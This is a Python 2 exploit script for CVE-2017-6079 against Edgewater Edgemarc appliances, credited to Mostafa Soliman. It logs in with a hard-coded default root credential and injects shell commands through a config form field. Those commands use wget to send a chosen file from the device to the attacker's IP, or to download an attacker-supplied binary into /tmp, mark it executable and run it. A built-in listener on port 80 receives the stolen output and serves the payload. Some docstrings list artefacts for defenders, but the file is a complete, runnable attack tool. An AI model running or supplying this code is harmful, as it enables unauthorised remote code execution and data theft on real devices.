import requests
import socket
import thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import sys
import shutil
import os
import random
import string
# ANSI SGR escape sequences used to colour the console output below.
HEADER = "\x1b[95m"   # bright magenta
OKBLUE = "\x1b[94m"   # bright blue
OKGREEN = "\x1b[92m"  # bright green
WARNING = "\x1b[93m"  # bright yellow
FAIL = "\x1b[91m"     # bright red
ENDC = "\x1b[0m"      # reset all attributes
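class RequestHandler(BaseHTTPRequestHandler):
    """Handler for the local listener: serves a file on GET, prints a body on POST.

    Both verbs set the module-level ``data_flag`` so that main() stops waiting.
    Everything read from the request (path, headers, body) is supplied by
    whichever peer connects and is treated as untrusted.
    """

    def do_GET(self):
        """Send the requested file from the current working directory.

        ``self.path`` comes straight from the network peer. It is resolved and
        checked to lie inside the working directory before it is opened;
        concatenating it onto ``os.curdir`` unchecked lets any client that can
        reach the listener read files outside that directory via ``..``
        segments.
        """
        global data_flag
        print OKGREEN
        print "[#] Target Connected"
        print "[#] Uploading %s"%(self.path)

        base_dir = os.path.realpath(os.curdir)
        wanted = os.path.realpath(os.path.join(base_dir, self.path.lstrip('/')))
        # realpath() collapses ".." and symlinks, so a prefix test is enough.
        contained = wanted.startswith(base_dir.rstrip(os.sep) + os.sep)

        if contained and os.path.isfile(wanted) and os.access(wanted, os.R_OK):
            # Open before sending headers so a failed open() never follows a 200;
            # the context manager closes the handle even if the peer disconnects.
            with open(wanted, 'rb') as f:
                self.send_response(200)
                self.send_header('Content-type', 'application/zip')
                self.end_headers()
                shutil.copyfileobj(f, self.wfile)
        else:
            print FAIL
            print "requested file is not in Current Working Dir, Plz move it there !!"
            # Answer the peer rather than leaving the request without a response.
            self.send_response(404)
            self.end_headers()
        print ENDC
        data_flag = True

    def do_POST(self):
        """Print the request body to the console and acknowledge with 200."""
        global data_flag
        print OKGREEN
        print "[#] Output Received ",ENDC
        content_length = self.headers.getheaders('content-length')
        try:
            length = int(content_length[0]) if content_length else 0
        except ValueError:
            # A non-numeric Content-Length from the peer must not crash the handler.
            length = 0
        # A negative size would make read() block until EOF.
        length = max(length, 0)
        print OKGREEN
        # NOTE(review): the body is echoed raw; bytes chosen by the peer may
        # contain terminal control sequences, and the size is not capped.
        print(self.rfile.read(length))
        print ENDC
        data_flag = True
        self.send_response(200)
        # Terminate the header block so the response is well-formed.
        self.end_headers()

    def log_request(self, code='-', size='-'):
        """Suppress the default per-request access log line."""
        pass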
def listener():
    """Run the callback HTTP server until ``server.shutdown()`` is called.

    Binds to every local interface on TCP port 80 and publishes the instance
    through the module-level ``server`` name so that main() can stop it.
    Port 80 is a privileged port on most systems, and the empty host string
    means any host that can route to this machine can reach RequestHandler.
    """
    global server
    bind_address = ('', 80)
    server = HTTPServer(bind_address, RequestHandler)
    server.serve_forever()
def read_file(TargetIP,AttackerIP,FilePath):
    """Submit a config form that makes the device POST FilePath to AttackerIP.

    One form POST goes to ``/cgi-bin/config?page=50&form=mainForm`` on
    TargetIP; its ``udefsEntries`` field carries a ``wget --post-file``
    command line and ``applyConfig`` is set to "1". The HTTP response is not
    inspected; any output arrives separately on the local listener.

    Observable artefacts for defenders: a POST to that page whose
    ``udefsEntries`` value contains a shell command, a fixed Basic credential
    sent over plain HTTP, and an outbound HTTP POST originating from the
    appliance itself. FilePath and AttackerIP are interpolated verbatim.
    """
    command = "wget --post-file %s http://%s"%(FilePath,AttackerIP)
    form = {
        "mainFormSubmitAction":"",
        "udefsEntries":command,
        "applyConfig":"1",
        "saveConfig":""
    }
    # Hard-coded Basic credential (base64 of "root:default"); presumably the
    # request is rejected once that account's password has been changed.
    basic_auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"}
    print OKBLUE
    print "[*] Reading '%s'"%(FilePath),ENDC
    url = "http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP)
    requests.post(url,headers=basic_auth,data=form)#, proxies=proxyDict)
def upload_file(TargetIP,AttackerIP,FileName):
    """Submit a config form that makes the device fetch FileName from AttackerIP.

    Picks five random uppercase letters, stores them in the module-level
    ``payload_name``, and sends a form POST to
    ``/cgi-bin/config?page=50&form=mainForm`` whose ``udefsEntries`` field is
    a ``wget -O /tmp/<name>`` command line. The HTTP response is not inspected.

    Observable artefacts for defenders: the same POST pattern as the other
    requests in this file, an outbound HTTP GET from the appliance, and a new
    file in ``/tmp`` whose name is five uppercase ASCII letters.
    """
    global payload_name
    letters = [random.choice(string.ascii_uppercase) for _ in range(5)]
    payload_name = ''.join(letters)
    command = "wget -O /tmp/%s http://%s/%s"%(payload_name,AttackerIP,FileName)
    form = {
        "mainFormSubmitAction":"",
        "udefsEntries":command,
        "applyConfig":"1",
        "saveConfig":""
    }
    # Hard-coded Basic credential (base64 of "root:default"); presumably the
    # request is rejected once that account's password has been changed.
    basic_auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"}
    print OKBLUE
    print "[*] Forcing the target to connect to us ",ENDC
    url = "http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP)
    requests.post(url,headers=basic_auth,data=form)#, proxies=proxyDict)
def execute_payload(TargetIP):
    """Submit a config form that marks the fetched file executable and runs it.

    Reads the module-level ``payload_name`` set by upload_file() and sends a
    form POST to ``/cgi-bin/config?page=50&form=mainForm`` whose
    ``udefsEntries`` field holds two newline-separated lines: a ``chmod 755``
    on ``/tmp/<name>`` followed by the path itself. The HTTP response is not
    inspected.

    Observable artefacts for defenders: a multi-line ``udefsEntries`` value in
    the POST, and a process started from ``/tmp`` on the appliance.
    """
    target_path = "chmod 755 /tmp/%s\n/tmp/%s"%(payload_name,payload_name)
    form = {
        "mainFormSubmitAction":"",
        "udefsEntries":target_path,
        "applyConfig":"1",
        "saveConfig":""
    }
    # Hard-coded Basic credential (base64 of "root:default"); presumably the
    # request is rejected once that account's password has been changed.
    basic_auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"}
    url = "http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP)
    requests.post(url,headers=basic_auth,data=form)#, proxies=proxyDict)
def print_banner():
    """Print the ASCII-art banner, CVE identifier and author line in the FAIL colour."""
    banner = """
_____ _ _
| ____|__| | __ _ _____ ____ _| |_ ___ _ __
| _| / _` |/ _` |/ _ \ \ /\ / / _` | __/ _ \ '__|
| |__| (_| | (_| | __/\ V V / (_| | || __/ |
|_____\__,_|\__, |\___| \_/\_/ \__,_|\__\___|_|
|___/
_____ _
| ____|__| | __ _ ___ _ __ ___ __ _ _ __ ___
| _| / _` |/ _` |/ _ \ '_ ` _ \ / _` | '__/ __|
| |__| (_| | (_| | __/ | | | | | (_| | | | (__
|_____\__,_|\__, |\___|_| |_| |_|\__,_|_| \___|
|___/
_____ _ _ _
| ____|_ ___ __ | | ___ (_) |_
| _| \ \/ / '_ \| |/ _ \| | __|
| |___ > <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
|_|
Edgewater Edgemarc Exploit CVE-2017-6079
Coded By: Mostafa Soliman"""
    # ENDC restores the terminal's default colour after the banner.
    print FAIL,banner,ENDC
def usage():
    """Print the command-line synopsis for this script and terminate the process."""
    synopsis = """
[USAGE] %s [operation] [TargetIP] [AttackerIP] [FilePath]
operation: Either read / upload
AttackerIP: IP address to receive the connection on
TargetIP: IP address of the target running Edgewater Edgemarc server
FilePath: Remote file to download in case of "read" operation
Local file to upload in case of "upload" operation
"""
    # argv[0] is substituted so the synopsis shows the name the script was run as.
    print synopsis%(sys.argv[0])
    exit()
def main():
    """Parse argv, start the listener thread and run the chosen operation.

    Expects exactly four arguments: operation ("read" or "upload", matched
    case-insensitively), TargetIP, AttackerIP and FilePath; anything else
    prints the usage text and exits. For "read" it sends the read request and
    waits for a handler to set ``data_flag``. For "upload" it sends the fetch
    request for the base name of FilePath, waits for ``data_flag``, stops the
    listener and then sends the execute request.
    """
    global data_flag
    print_banner()
    data_flag = False
    if len(sys.argv) !=5:
        usage()
    operation, TargetIP, AttackerIP, FilePath = sys.argv[1:5]
    mode = operation.lower()
    if mode not in ("upload", "read"):
        print FAIL,"Wrong Operation",ENDC
        usage()
    # The listener publishes itself through the module-level `server` name.
    thread.start_new_thread( listener ,())
    if mode == "read":
        read_file(TargetIP,AttackerIP,FilePath)
        # Busy-wait with no timeout until a request handler sets data_flag.
        while not data_flag:
            pass
        server.shutdown()
    elif mode == "upload":
        # Only the final path component is requested; the handler serves it
        # from the current working directory.
        upload_file(TargetIP,AttackerIP,FilePath.split("/")[-1])
        # Busy-wait with no timeout until a request handler sets data_flag.
        while not data_flag:
            pass
        server.shutdown()
        print "[#] Executing The Payload",ENDC
        execute_payload(TargetIP)
# Run main() only when the file is executed as a script, not when imported.
if "__main__" == __name__:
    main()